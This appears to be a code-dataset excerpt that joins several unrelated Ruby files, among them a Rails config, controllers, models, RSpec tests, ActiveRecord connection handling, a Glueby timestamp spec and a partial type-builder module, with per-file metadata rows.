config.active_support.escape_html_entities_in_json = true
# Use SQL instead of Active Record's schema dumper when creating the database.
# This is necessary if your schema can't be completely dumped by the schema dumper,
# like if you have constraints or database-specific column types
# config.active_record.schema_format = :sql
    # Configure the view paths for the Sidekiq worker partials used for batch printing
config.paths['app/views'].unshift("#{Rails.root}/app/views/tccs")
config.generators do |g|
g.test_framework :rspec, fixture: true
g.fixture_replacement :fabrication
end
# config/application.rb
# => Markdown (for CKEditor)
# => https://github.com/rails/sprockets/blob/99444c0a280cc93e33ddf7acfe961522dec3dcf5/guides/extending_sprockets.md#register-mime-types
config.before_initialize do |app|
Sprockets.register_mime_type 'text/markdown', extensions: ['.md']
end
end
end
ActiveRecord::SessionStore::Session.serializer = :marshal
| 43.78481 | 139 | 0.730558 |
f8a1f3e3b3c6392d1bf75706c106f67a2ca700dc | 1,060 | class SponsorsController < ApplicationController
before_action :set_sponsor, only: [:update, :edit, :show, :destroy]
before_action :authorize_sponsor, except: [:index, :new, :create]
def index
@sponsors = Sponsor.all
authorize @sponsors
end
def show
end
def new
@sponsor = Sponsor.new
authorize_sponsor
end
def create
@sponsor = Sponsor.new(sponsor_params)
authorize_sponsor
if @sponsor.save
redirect_to sponsor_path(@sponsor)
else
render :new
end
end
def edit
end
def update
if @sponsor.update(sponsor_params)
redirect_to sponsor_path(@sponsor)
else
      render :edit
end
end
def destroy
@sponsor.destroy
redirect_to sponsors_path
end
private
def sponsor_params
permitted = [:name, :image, :order, :imagelink] + Sponsor.globalize_attribute_names
params.require(:sponsor).permit(permitted)
end
def set_sponsor
@sponsor = Sponsor.find(params[:id])
end
def authorize_sponsor
authorize @sponsor
end
end
| 18.275862 | 87 | 0.679245 |
03b409c4aa91a1a7958f437cac3148e3b8e6f797 | 1,559 | dir = File.dirname(__FILE__)
require File.expand_path("#{dir}/../helper/spec_helper")
describe "an RogueGemFinder instance" do
before(:each) do
GemInstaller::TestGemHome.use
@registry = GemInstaller::create_registry
@rogue_gem_finder = @registry.rogue_gem_finder
@gem_command_manager = @registry.gem_command_manager
@rogue_gem = sample_gem
@legit_gem = sample_dependent_multiplatform_gem
@legit_gem.install_options << "--include-dependencies"
@mock_output_proxy = mock("Mock OutputProxy")
@rogue_gem_finder.output_proxy = @mock_output_proxy
end
# This is a hack to make the suite pass under Rubygems <= 1.3.0 (maybe < 1.3.0?)
# See http://thewoolleyweb.lighthouseapp.com/projects/11580-geminstaller/tickets/38-test-failures-under-older-rubygems-due-to-invalid-spec-warnings
if GemInstaller::RubyGemsVersionChecker.matches?('> 1.3.0')
it "should return yaml for all locally installed gems which are not matched by one of the config gems passed in" do
@gem_command_manager.install_gem(@rogue_gem)
# legit gem will also install a dependency, which should be detected as a valid gem in the config,
# since it's parent is in the config
@gem_command_manager.install_gem(@legit_gem)
@mock_output_proxy.should_receive(:sysout)
config_file_paths = []
output = @rogue_gem_finder.print_rogue_gems([@legit_gem], config_file_paths)
output.should match(/#{@rogue_gem.name}/)
end
end
after(:each) do
GemInstaller::TestGemHome.uninstall_all_test_gems
end
end
| 38.02439 | 149 | 0.744067 |
e2392b239d30c264342fefe1d90a8e2702683156 | 794 | module Railspress
class Category < Taxonomy
has_many :sub_categories, class_name: Railspress::Category.name, foreign_key: :parent, primary_key: :id
def self.cloud
      cats = all.reject { |r| r.posts.empty? }
      total_posts = cats.inject(0) { |sum, t| sum + t.count }
      cats.map { |t| { category: t, size: 1.0 + (t.count / total_posts.to_f * 2) } }.sort_by { |sb| sb[:category].slug }
end
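    # Illustrative result (hypothetical data):
    #   Category.cloud #=> [{ category: #<Category slug: "news">, size: 1.4 }, ...]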
def self.find_or_create category_name, parent = nil
raise "category name can't be blank" if category_name.blank?
parent_id = parent.try(:id).to_i
category = joins(:term).where(wp_terms: {name: category_name}, parent: parent_id).first
category ||= create!(description: category_name, term_id: Term.create!(name: category_name).id, parent: parent_id)
end
end
end | 44.111111 | 120 | 0.685139 |
acfdd0fd983d9b2852c9051a211e925a910372c1 | 3,237 | # frozen_string_literal: true
# == Schema Information
#
# Table name: training_slides
#
# id :bigint(8) not null, primary key
# name :string(255)
# estimated_ttc :string(255)
# wiki_page :string(255)
# slide_slugs :text(65535)
# description :text(65535)
# translations :text(16777215)
# slug :string(255)
# created_at :datetime not null
# updated_at :datetime not null
#
require_dependency "#{Rails.root}/lib/training/training_base"
#= Class representing an individual training module
class TrainingModule < ApplicationRecord
attr_accessor :status
serialize :slide_slugs, Array
serialize :translations, Hash
validates :slug, uniqueness: true
def self.path_to_yaml
"#{base_path}/modules/*.yml"
end
def self.wiki_base_page
ENV['training_modules_wiki_page']
end
def self.trim_id_from_filename
false
end
def self.load
TrainingBase.load(content_class: self)
end
def self.base_path
TrainingBase.base_path
end
def self.load_all
TrainingBase.load_all
end
# This reloads all the library and module content, but only updates the slides
# for the module with the given slug.
def self.reload_module(slug:)
# First reload the libraries and modules so we have the new list of slugs
# and can load slides for brand-new modules.
TrainingLibrary.load
TrainingModule.load
# Reload the requested module's slides
training_module = TrainingModule.find_by(slug: slug)
raise ModuleNotFound, "No module #{slug} found!" unless training_module
TrainingSlide.load(slug_list: training_module.slide_slugs)
end
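  # e.g. TrainingModule.reload_module(slug: 'editing-basics')  # slug value is illustrative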
def self.inflate(content, slug, wiki_page = nil) # rubocop:disable Metrics/MethodLength
training_module = TrainingModule.find_or_initialize_by(id: content['id'])
training_module.slug = slug
training_module.name = content['name'] || content[:name]
training_module.description = content['description'] || content[:description]
training_module.estimated_ttc = content['estimated_ttc']
training_module.translations = content['translations']
training_module.wiki_page = wiki_page
training_module.slide_slugs = content['slides'].pluck('slug')
valid = training_module.valid?
if training_module.errors[:slug].any?
raise TrainingBase::DuplicateSlugError,
"Duplicate TrainingModule slug detected: #{slug}"
end
training_module.save if valid
training_module
rescue StandardError, TypeError => e # rubocop:disable Lint/ShadowedException
puts "There's a problem with file '#{slug}'"
raise e
end
####################
# Instance methods #
####################
def slides
return @sorted_slides if @sorted_slides.present?
selected_slides = TrainingSlide.where(slug: slide_slugs)
@sorted_slides = selected_slides.sort do |a, b|
slide_slugs.index(a.slug) <=> slide_slugs.index(b.slug)
end
end
def translated_name
translated(:name) || name
end
def translated_description
translated(:description) || description
end
def translated(key)
translations.dig(I18n.locale.to_s, key)
end
class ModuleNotFound < StandardError; end
end
| 28.901786 | 89 | 0.703429 |
1a760508723bd1c9f2ffac981fdce34197d6eadd | 9,951 | require 'set'
module ActiveRecord
class Base
class ConnectionSpecification #:nodoc:
attr_reader :config, :adapter_method
      def initialize(config, adapter_method)
@config, @adapter_method = config, adapter_method
end
end
# Check for activity after at least +verification_timeout+ seconds.
# Defaults to 0 (always check.)
cattr_accessor :verification_timeout, :instance_writer => false
@@verification_timeout = 0
# The class -> [adapter_method, config] map
@@defined_connections = {}
# The class -> thread id -> adapter cache. (class -> adapter if not allow_concurrency)
@@active_connections = {}
class << self
# Retrieve the connection cache.
def thread_safe_active_connections #:nodoc:
@@active_connections[Thread.current.object_id] ||= {}
end
def single_threaded_active_connections #:nodoc:
@@active_connections
end
# pick up the right active_connection method from @@allow_concurrency
if @@allow_concurrency
alias_method :active_connections, :thread_safe_active_connections
else
alias_method :active_connections, :single_threaded_active_connections
end
# set concurrency support flag (not thread safe, like most of the methods in this file)
def allow_concurrency=(threaded) #:nodoc:
logger.debug "allow_concurrency=#{threaded}" if logger
return if @@allow_concurrency == threaded
clear_all_cached_connections!
@@allow_concurrency = threaded
method_prefix = threaded ? "thread_safe" : "single_threaded"
sing = (class << self; self; end)
[:active_connections, :scoped_methods].each do |method|
sing.send(:alias_method, method, "#{method_prefix}_#{method}")
end
log_connections if logger
end
def active_connection_name #:nodoc:
@active_connection_name ||=
if active_connections[name] || @@defined_connections[name]
name
elsif self == ActiveRecord::Base
nil
else
superclass.active_connection_name
end
end
def clear_active_connection_name #:nodoc:
@active_connection_name = nil
subclasses.each { |klass| klass.clear_active_connection_name }
end
# Returns the connection currently associated with the class. This can
# also be used to "borrow" the connection to do database work unrelated
# to any of the specific Active Records.
def connection
if @active_connection_name && (conn = active_connections[@active_connection_name])
conn
else
# retrieve_connection sets the cache key.
conn = retrieve_connection
active_connections[@active_connection_name] = conn
end
end
# Clears the cache which maps classes to connections.
def clear_active_connections!
clear_cache!(@@active_connections) do |name, conn|
conn.disconnect!
end
end
      # Clears the cache of connections that require reloading, disconnecting them first.
def clear_reloadable_connections!
@@active_connections.each do |name, conn|
if conn.requires_reloading?
conn.disconnect!
@@active_connections.delete(name)
end
end
end
# Verify active connections.
def verify_active_connections! #:nodoc:
if @@allow_concurrency
remove_stale_cached_threads!(@@active_connections) do |name, conn|
conn.disconnect!
end
end
active_connections.each_value do |connection|
connection.verify!(@@verification_timeout)
end
end
private
def clear_cache!(cache, thread_id = nil, &block)
if cache
if @@allow_concurrency
thread_id ||= Thread.current.object_id
thread_cache, cache = cache, cache[thread_id]
return unless cache
end
cache.each(&block) if block_given?
cache.clear
end
ensure
if thread_cache && @@allow_concurrency
thread_cache.delete(thread_id)
end
end
# Remove stale threads from the cache.
def remove_stale_cached_threads!(cache, &block)
stale = Set.new(cache.keys)
Thread.list.each do |thread|
stale.delete(thread.object_id) if thread.alive?
end
stale.each do |thread_id|
clear_cache!(cache, thread_id, &block)
end
end
def clear_all_cached_connections!
if @@allow_concurrency
@@active_connections.each_value do |connection_hash_for_thread|
connection_hash_for_thread.each_value {|conn| conn.disconnect! }
connection_hash_for_thread.clear
end
else
@@active_connections.each_value {|conn| conn.disconnect! }
end
@@active_connections.clear
end
end
# Returns the connection currently associated with the class. This can
# also be used to "borrow" the connection to do database work that isn't
# easily done without going straight to SQL.
def connection
self.class.connection
end
# Establishes the connection to the database. Accepts a hash as input where
# the :adapter key must be specified with the name of a database adapter (in lower-case)
# example for regular databases (MySQL, Postgresql, etc):
#
# ActiveRecord::Base.establish_connection(
# :adapter => "mysql",
# :host => "localhost",
# :username => "myuser",
# :password => "mypass",
# :database => "somedatabase"
# )
#
# Example for SQLite database:
#
# ActiveRecord::Base.establish_connection(
# :adapter => "sqlite",
# :database => "path/to/dbfile"
# )
#
# Also accepts keys as strings (for parsing from yaml for example):
# ActiveRecord::Base.establish_connection(
# "adapter" => "sqlite",
# "database" => "path/to/dbfile"
# )
#
    # The exceptions AdapterNotSpecified, AdapterNotFound and ArgumentError
    # may be raised on an error.
def self.establish_connection(spec = nil)
case spec
when nil
raise AdapterNotSpecified unless defined? RAILS_ENV
establish_connection(RAILS_ENV)
when ConnectionSpecification
clear_active_connection_name
@active_connection_name = name
@@defined_connections[name] = spec
when Symbol, String
if configuration = configurations[spec.to_s]
establish_connection(configuration)
else
raise AdapterNotSpecified, "#{spec} database is not configured"
end
else
spec = spec.symbolize_keys
unless spec.key?(:adapter) then raise AdapterNotSpecified, "database configuration does not specify adapter" end
adapter_method = "#{spec[:adapter]}_connection"
unless respond_to?(adapter_method) then raise AdapterNotFound, "database configuration specifies nonexistent #{spec[:adapter]} adapter" end
remove_connection
establish_connection(ConnectionSpecification.new(spec, adapter_method))
end
end
# Locate the connection of the nearest super class. This can be an
# active or defined connections: if it is the latter, it will be
# opened and set as the active connection for the class it was defined
# for (not necessarily the current class).
def self.retrieve_connection #:nodoc:
# Name is nil if establish_connection hasn't been called for
# some class along the inheritance chain up to AR::Base yet.
if name = active_connection_name
if conn = active_connections[name]
# Verify the connection.
conn.verify!(@@verification_timeout)
elsif spec = @@defined_connections[name]
# Activate this connection specification.
klass = name.constantize
klass.connection = spec
conn = active_connections[name]
end
end
conn or raise ConnectionNotEstablished
end
# Returns true if a connection that's accessible to this class have already been opened.
def self.connected?
active_connections[active_connection_name] ? true : false
end
# Remove the connection for this class. This will close the active
# connection and the defined connection (if they exist). The result
# can be used as argument for establish_connection, for easy
# re-establishing of the connection.
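    #
    # Example (sketch):
    #
    #   config = ActiveRecord::Base.remove_connection
    #   ActiveRecord::Base.establish_connection(config)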
def self.remove_connection(klass=self)
spec = @@defined_connections[klass.name]
konn = active_connections[klass.name]
@@defined_connections.delete_if { |key, value| value == spec }
active_connections.delete_if { |key, value| value == konn }
konn.disconnect! if konn
spec.config if spec
end
# Set the connection for the class.
def self.connection=(spec) #:nodoc:
if spec.kind_of?(ActiveRecord::ConnectionAdapters::AbstractAdapter)
active_connections[name] = spec
elsif spec.kind_of?(ConnectionSpecification)
config = spec.config.reverse_merge(:allow_concurrency => @@allow_concurrency)
self.connection = self.send(spec.adapter_method, config)
elsif spec.nil?
raise ConnectionNotEstablished
else
establish_connection spec
end
end
# connection state logging
def self.log_connections #:nodoc:
if logger
logger.info "Defined connections: #{@@defined_connections.inspect}"
logger.info "Active connections: #{active_connections.inspect}"
logger.info "Active connection name: #{@active_connection_name}"
end
end
end
end
| 35.539286 | 149 | 0.643654 |
8707a247f3884736cf02b36bd2781da89f1e2328 | 2,499 | module Netzke
module Core
module DynamicAssets
class << self
def ext_js(form_authenticity_token)
res = initial_dynamic_javascript(form_authenticity_token) << "\n"
include_base_js(res)
# Ext-specific JavaScript
res << File.new(File.expand_path("../../../../javascripts/ext.js", __FILE__)).read
# Pluggable JavaScript (used by other Netzke-powered gems like netzke-basepack)
Netzke::Core.ext_javascripts.each do |path|
f = File.new(path)
res << f.read
end
strip_js_comments(res)
end
def ext_css
res = File.new(File.expand_path("../../../../stylesheets/core.css", __FILE__)).read
# Pluggable stylesheets (may be used by other Netzke-powered gems like netzke-basepack)
Netzke::Core.ext_stylesheets.each do |path|
f = File.new(path)
res << f.read
end
res
end
def strip_js_comments(js_string)
if defined?(::Rails) && !::Rails.env.development? && compressor = ::Rails.application.assets.js_compressor
compressor.processor.call(nil, js_string)
else
js_string
end
end
private
# Generates initial javascript code that is dependent on Rails settings
def initial_dynamic_javascript(form_authenticity_token)
res = []
res << %(Ext.Ajax.extraParams = {authenticity_token: '#{form_authenticity_token}'}; // Rails' forgery protection)
res << %{Ext.ns('Netzke');}
res << %{Ext.ns('Netzke.core');}
res << %{Netzke.RelativeUrlRoot = '#{ActionController::Base.config.relative_url_root}';}
res << %{Netzke.ControllerUrl = '#{ActionController::Base.config.relative_url_root}#{Rails.application.routes.url_helpers.netzke_path('')}';}
res << %{Netzke.RelativeExtUrl = '#{ActionController::Base.config.relative_url_root}#{Netzke::Core.ext_uri}';}
res << %{Netzke.core.directMaxRetries = #{Netzke::Core.js_direct_max_retries};}
res.join("\n")
end
def include_base_js(arry)
# JavaScript extensions
arry << File.new(File.expand_path("../../../../javascripts/js_extensions.js", __FILE__)).read
# Base Netzke component JavaScript
arry << File.new(File.expand_path("../../../../javascripts/base.js", __FILE__)).read
end
end
end
end
end
| 35.197183 | 151 | 0.603041 |
d5522994990023dba35f541b838f782c2ad0ec43 | 38 | module Steep
VERSION = "0.49.1"
end
| 9.5 | 20 | 0.657895 |
6af0c34c18b5dee75eac12fba3e3c27cde1ecfe9 | 1,082 | cask "reaper" do
version "6.17.0,6.17"
if MacOS.version <= :mojave
sha256 "dff7839871a244f4d3343dd4f5386faace7a56f42df427df4d4995063a77f568"
url "https://www.reaper.fm/files/#{version.major}.x/reaper#{version.after_comma.no_dots}_x86_64.dmg"
else
sha256 "baaff9741d6982086aa2ec301014b11c8f4883c3bcfd3766016faad7b3bdb3f7"
url "https://www.reaper.fm/files/#{version.major}.x/reaper#{version.after_comma.no_dots}_x86_64_catalina.dmg"
end
appcast "https://www.cockos.com/reaper/latestversion/?p=osx_64",
must_contain: version.after_comma
name "REAPER"
desc "Digital audio production application"
homepage "https://www.reaper.fm/"
app "REAPER64.app"
app "ReaMote64.app"
zap trash: [
"~/Library/Application Support/REAPER",
"~/Library/Saved Application State/com.cockos.reaper.savedState",
"~/Library/Saved Application State/com.cockos.reaperhosti386.savedState",
"~/Library/Saved Application State/com.cockos.reaperhostx8664.savedState",
"~/Library/Saved Application State/com.cockos.ReaMote.savedState",
]
end
| 34.903226 | 113 | 0.748614 |
acd0bd1717131f9d39f5217e726a524397a6d151 | 2,457 | module Calagator
module DuplicateChecking
class DuplicateFinder < Struct.new(:model, :fields)
def find
scope = model.all
scope = yield(scope) if block_given?
scope = apply_query(scope) unless na?
group_by_fields(scope.to_a)
end
def fields
super.map(&:to_sym)
end
private
def na?
fields.empty? || fields == [:na]
end
def apply_query scope
scope = scope.select("#{model.table_name}.*")
scope.from!("#{model.table_name}, #{model.table_name} b")
scope.where!("#{model.table_name}.id <> b.id")
scope.where!("#{model.table_name}.duplicate_of_id" => nil)
scope.where!(query)
scope.distinct!
end
def query
case fields
when [:all] then query_from_all
when [:any] then query_from_any
else query_from_fields
end
end
def group_by_fields records
# Group by the field values we're matching on; skip any values for which we only have one record
records = records.group_by do |record|
Array(fields).map do |field|
record.read_attribute(field)
end
end
        records.reject { |_value, group| group.size <= 1 }
end
def query_from_all
attributes.map do |attr|
"((#{full_attr(attr)} = b.#{attr}) OR (#{full_attr(attr)} IS NULL AND b.#{attr} IS NULL))"
end.join(" AND ")
end
def query_from_any
attributes.map do |attr|
"(#{full_attr(attr)} = b.#{attr} AND (#{is_truthy_subquery(attr)}))"
end.join(" OR ")
end
def is_truthy_subquery(attr)
        column = model.columns.find { |col| col.name.to_sym == attr }
query = case column.type
when :integer, :decimal then
"#{full_attr(attr)} != 0 AND "
when :string, :text
"#{full_attr(attr)} != '' AND "
end
"#{query}#{full_attr(attr)} IS NOT NULL"
end
def query_from_fields
raise ArgumentError, "Unknown fields: #{fields.inspect}" if (Array(fields) - attributes).any?
Array(fields).map do |attr|
"#{full_attr(attr)} = b.#{attr}"
end.join(" AND ")
end
def attributes
# TODO make :all pay attention to ignore fields
model.new.attribute_names.map(&:to_sym).reject do |attr|
[:id, :created_at, :updated_at, :duplicate_of_id, :version].include?(attr)
end
end
def full_attr(attr)
"#{model.table_name}.#{attr}"
end
end
end
end
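# Usage sketch (Event and :title are hypothetical):
#   Calagator::DuplicateChecking::DuplicateFinder.new(Event, [:title]).find
#   #=> { ["Duplicate title"] => [#<Event id: 1>, #<Event id: 2>] }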
| 26.419355 | 102 | 0.601954 |
4a77356c818b3c4ec92a219d5925d83735adae8f | 1,037 | =begin
#Selling Partner API for Merchant Fulfillment
#The Selling Partner API for Merchant Fulfillment helps you build applications that let sellers purchase shipping for non-Prime and Prime orders using Amazon’s Buy Shipping Services.
OpenAPI spec version: v0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 3.0.33
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for AmzSpApi::MerchantFulfillmentV0::StandardIdForLabel
# Automatically generated by swagger-codegen (github.com/swagger-api/swagger-codegen)
# Please update as you see appropriate
describe 'StandardIdForLabel' do
before do
# run before each test
@instance = AmzSpApi::MerchantFulfillmentV0::StandardIdForLabel.new
end
after do
# run after each test
end
describe 'test an instance of StandardIdForLabel' do
it 'should create an instance of StandardIdForLabel' do
expect(@instance).to be_instance_of(AmzSpApi::MerchantFulfillmentV0::StandardIdForLabel)
end
end
end
| 29.628571 | 182 | 0.784957 |
6250b8bedfa6718c1cc55db941cd6c1867af1896 | 263 | class AddCounterCacheColumnForRelatedContentLinks < ActiveRecord::Migration
def change
rename_column :contact_records, :websites_count, :contact_form_links_count
add_column :contact_records, :related_content_links_count, :integer, default: 0
end
end
| 32.875 | 83 | 0.825095 |
ff0120c6b99a5e959890d6f65a36c403106bc127 | 672 | #
# Cookbook:: apache2
# Recipe:: mod_authn_dbd
#
# Copyright:: 2013, OneHealth Solutions, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
apache2_module 'authn_dbd'
| 32 | 74 | 0.754464 |
8756b5e3b9f59310824c256e5a09bd606fcbf20b | 1,630 | require 'rails_helper'
module Genova
module Command
describe Executor do
let(:executor) { Command::Executor.new }
let(:io_mock) { double(IO) }
describe 'command' do
context 'when command was successful.' do
it 'should be return stdout' do
allow(io_mock).to receive(:write)
allow(io_mock).to receive(:close)
response = []
response << io_mock
response << ['stdout']
response << []
allow(Open3).to receive(:popen3).and_yield(*response)
expect(executor.command('dummy')).to eq('stdout')
end
end
context 'when command was failure.' do
it 'should be raise error' do
allow(io_mock).to receive(:write)
allow(io_mock).to receive(:close)
response = []
response << io_mock
response << ['stdout']
response << ['stderr']
allow(Open3).to receive(:popen3).and_yield(*response)
expect { executor.command('dummy') }.to raise_error(Exceptions::OutputError)
end
end
context 'when forcibly terminated' do
it 'should be raise error' do
allow(io_mock).to receive(:write)
allow(io_mock).to receive(:close)
response = []
response << io_mock
response << []
response << []
allow(Open3).to receive(:popen3).and_raise(Interrupt)
expect { executor.command('dummy') }.to raise_error(Interrupt)
end
end
end
end
end
end
| 28.103448 | 88 | 0.539877 |
abff51de79c3d17680b8f29588d425dc0380fddb | 3,617 | RSpec.describe 'Glueby::Contract::Timestamp' do
describe '#save!' do
subject { contract.save! }
let(:contract) do
Glueby::Contract::Timestamp.new(
wallet: wallet,
content: "\01",
prefix: ''
)
end
let(:wallet) { TestWallet.new(internal_wallet) }
let(:internal_wallet) { TestInternalWallet.new }
let(:unspents) do
[
{
txid: '5c3d79041ff4974282b8ab72517d2ef15d8b6273cb80a01077145afb3d5e7cc5',
script_pubkey: '76a914234113b860822e68f9715d1957af28b8f5117ee288ac',
vout: 0,
amount: 100_000_000,
finalized: false
}, {
txid: 'd49c8038943d37c2723c9c7a1c4ea5c3738a9bad5827ddc41e144ba6aef36db',
script_pubkey: '76a914234113b860822e68f9715d1957af28b8f5117ee288ac',
vout: 1,
amount: 100_000_000,
finalized: true
}, {
txid: '1d49c8038943d37c2723c9c7a1c4ea5c3738a9bad5827ddc41e144ba6aef36db',
script_pubkey: '76a914234113b860822e68f9715d1957af28b8f5117ee288ac',
vout: 2,
amount: 50_000_000,
finalized: true
}, {
txid: '864247cd4cae4b1f5bd3901be9f7a4ccba5bdea7db1d8bbd78b944da9cf39ef5',
vout: 0,
script_pubkey: '21c3eb2b846463430b7be9962843a97ee522e3dc0994a0f5e2fc0aa82e20e67fe893bc76a914bfeca7aed62174a7c60ebc63c7bd797bad46157a88ac',
amount: 1,
finalized: true
}, {
txid: 'f14b29639483da7c8d17b7b7515da4ff78b91b4b89434e7988ab1bc21ab41377',
vout: 0,
script_pubkey: '21c2dbbebb191128de429084246fa3215f7ccc36d6abde62984eb5a42b1f2253a016bc76a914fc688c091d91789ccda7a27bd8d88be9ae4af58e88ac',
amount: 100_000,
finalized: true
}, {
txid: '100c4dc65ea4af8abb9e345b3d4cdcc548bb5e1cdb1cb3042c840e147da72fa2',
vout: 0,
script_pubkey: '21c150ad685ec8638543b2356cb1071cf834fb1c84f5fa3a71699c3ed7167dfcdbb3bc76a9144f15d2203821d7ea719314126b79bd1e530fc97588ac',
amount: 100_000,
finalized: true
}, {
txid: 'a3f20bc94c8d77c35ba1770116d2b34375475a4194d15f76442636e9f77d50d9',
vout: 2,
script_pubkey: '21c150ad685ec8638543b2356cb1071cf834fb1c84f5fa3a71699c3ed7167dfcdbb3bc76a9144f15d2203821d7ea719314126b79bd1e530fc97588ac',
amount: 100_000,
finalized: true
}
]
end
let(:rpc) { double('mock') }
before do
allow(Glueby::Internal::RPC).to receive(:client).and_return(rpc)
allow(rpc).to receive(:getnewaddress).and_return('13L2GiUwB3HuyURm81ht6JiQAa8EcBN23H')
allow(internal_wallet).to receive(:list_unspent).and_return(unspents)
allow(internal_wallet).to receive(:broadcast).and_return('a01d8a6bf7bef5719ada2b7813c1ce4dabaf8eb4ff22791c67299526793b511c')
end
it { expect(subject).to eq 'a01d8a6bf7bef5719ada2b7813c1ce4dabaf8eb4ff22791c67299526793b511c' }
it 'create transaction' do
subject
expect(contract.tx.inputs.size).to eq 1
expect(contract.tx.outputs.size).to eq 2
expect(contract.tx.outputs[0].value).to eq 0
expect(contract.tx.outputs[0].script_pubkey.op_return?).to be_truthy
expect(contract.tx.outputs[0].script_pubkey.op_return_data.bth).to eq "4bf5122f344554c53bde2ebb8cd2b7e3d1600ad631c385a5d7cce23c7785459a"
expect(contract.tx.outputs[1].value).to eq 99_990_000
end
context 'if already broadcasted' do
before { contract.save! }
it { expect { subject }.to raise_error(Glueby::Contract::Errors::TxAlreadyBroadcasted) }
end
end
end
| 41.102273 | 148 | 0.699475 |
87fe2b9d300204d61b23e5663b8e4c80bec14222 | 1,040 | {
matrix_id: '1638',
name: 'tols2000',
group: 'Bai',
description: 'TOLOSA MATRIX',
author: 'S. Godet-Thobie',
editor: 'Z. Bai, D. Day, J. Demmel, J. Dongarra',
date: '1991',
kind: 'computational fluid dynamics problem',
problem_2D_or_3D: '1',
num_rows: '2000',
num_cols: '2000',
nonzeros: '5184',
num_explicit_zeros: '0',
num_strongly_connected_components: '1529',
num_dmperm_blocks: '1983',
structural_full_rank: 'true',
structural_rank: '2000',
pattern_symmetry: '0.339',
numeric_symmetry: '0.000',
rb_type: 'real',
structure: 'unsymmetric',
cholesky_candidate: 'no',
positive_definite: 'no',
norm: '5.963364e+06',
min_singular_value: '9.953124e-01',
condition_number: '5.991450e+06',
svd_rank: '2000',
sprank_minus_rank: '0',
null_space_dimension: '0',
full_numerical_rank: 'yes',
image_files: 'tols2000.png,tols2000_dmperm.png,tols2000_scc.png,tols2000_svd.png,tols2000_APlusAT_graph.gif,tols2000_graph.gif,',
}
| 30.588235 | 133 | 0.658654 |
6a81f7ac5848fed16a315dba5642060e1d7c7ccb | 5,133 | # mundi_api
#
# This file was automatically generated by APIMATIC v2.0 (
# https://apimatic.io ).
require 'date'
module MundiApi
# Response object for getting a customer
class GetCustomerResponse < BaseModel
# TODO: Write general description for this method
# @return [String]
attr_accessor :id
# TODO: Write general description for this method
# @return [String]
attr_accessor :name
# TODO: Write general description for this method
# @return [String]
attr_accessor :email
# TODO: Write general description for this method
# @return [Boolean]
attr_accessor :delinquent
# TODO: Write general description for this method
# @return [DateTime]
attr_accessor :created_at
# TODO: Write general description for this method
# @return [DateTime]
attr_accessor :updated_at
# TODO: Write general description for this method
# @return [String]
attr_accessor :document
# TODO: Write general description for this method
# @return [String]
attr_accessor :type
# TODO: Write general description for this method
# @return [String]
attr_accessor :fb_access_token
# TODO: Write general description for this method
# @return [GetAddressResponse]
attr_accessor :address
# TODO: Write general description for this method
# @return [Array<String, String>]
attr_accessor :metadata
# TODO: Write general description for this method
# @return [GetPhonesResponse]
attr_accessor :phones
# TODO: Write general description for this method
# @return [Long]
attr_accessor :fb_id
    # Customer reference code in the store's system. Max: 52 characters
# @return [String]
attr_accessor :code
    # Customer reference code in the store's system. Max: 52 characters
# @return [String]
attr_accessor :document_type
# A mapping from model property names to API property names.
def self.names
@_hash = {} if @_hash.nil?
@_hash['id'] = 'id'
@_hash['name'] = 'name'
@_hash['email'] = 'email'
@_hash['delinquent'] = 'delinquent'
@_hash['created_at'] = 'created_at'
@_hash['updated_at'] = 'updated_at'
@_hash['document'] = 'document'
@_hash['type'] = 'type'
@_hash['fb_access_token'] = 'fb_access_token'
@_hash['address'] = 'address'
@_hash['metadata'] = 'metadata'
@_hash['phones'] = 'phones'
@_hash['fb_id'] = 'fb_id'
@_hash['code'] = 'code'
@_hash['document_type'] = 'document_type'
@_hash
end
def initialize(id = nil,
name = nil,
email = nil,
delinquent = nil,
created_at = nil,
updated_at = nil,
document = nil,
type = nil,
fb_access_token = nil,
address = nil,
metadata = nil,
phones = nil,
code = nil,
document_type = nil,
fb_id = nil)
@id = id
@name = name
@email = email
@delinquent = delinquent
@created_at = created_at
@updated_at = updated_at
@document = document
@type = type
@fb_access_token = fb_access_token
@address = address
@metadata = metadata
@phones = phones
@fb_id = fb_id
@code = code
@document_type = document_type
end
# Creates an instance of the object from a hash.
def self.from_hash(hash)
return nil unless hash
# Extract variables from the hash.
id = hash['id']
name = hash['name']
email = hash['email']
delinquent = hash['delinquent']
created_at = APIHelper.rfc3339(hash['created_at']) if hash['created_at']
updated_at = APIHelper.rfc3339(hash['updated_at']) if hash['updated_at']
document = hash['document']
type = hash['type']
fb_access_token = hash['fb_access_token']
address = GetAddressResponse.from_hash(hash['address']) if
hash['address']
metadata = hash['metadata']
phones = GetPhonesResponse.from_hash(hash['phones']) if hash['phones']
code = hash['code']
document_type = hash['document_type']
fb_id = hash['fb_id']
# Create object from extracted values.
GetCustomerResponse.new(id,
name,
email,
delinquent,
created_at,
updated_at,
document,
type,
fb_access_token,
address,
metadata,
phones,
code,
document_type,
fb_id)
end
end
end
| 31.29878 | 79 | 0.543931 |
7af30a2f2e64f96960ac0e0157f814e47d406438 | 6,579 | # frozen_string_literal: true
require 'dry-logic'
require 'dry/logic/rule_compiler'
require 'dry/logic/predicates'
module Typed
module Builder
# Entrypoint
def self.any
AnyHandler.instance
end
Result = ::Struct.new(:ok, :value, :message)
class Result
attr_reader :ok, :value
def initialize(ok, value, message)
@ok = ok
@value = value
@failure_block = message
end
def message
@message ||= @failure_block.call
end
class << self
def success(value)
new(true, value, nil)
end
def failure(&failure_block)
new(false, nil, failure_block)
end
end
end
module BaseType
def nullable
Typed.null | self
end
def missable
Typed.value(Undefined) | self
end
def default(new_value = Typed::Undefined, &block)
call(new_value) unless block
block ||= -> { new_value }
DefaultType.new(self) { call(block.call) }
end
def instance(expected_class)
constrained(type: expected_class)
end
def enum(*values)
constrained(included_in: values.map { |value| call(value) })
end
def |(other)
expected_type other
SumType.new(self, other)
end
def constructor(input: Typed.any, swallow: [], &block)
expected_type(input)
return self unless block_given?
CoerceType.new(input, self, swallow, &block)
end
def constrained(**dry_options, &constraint)
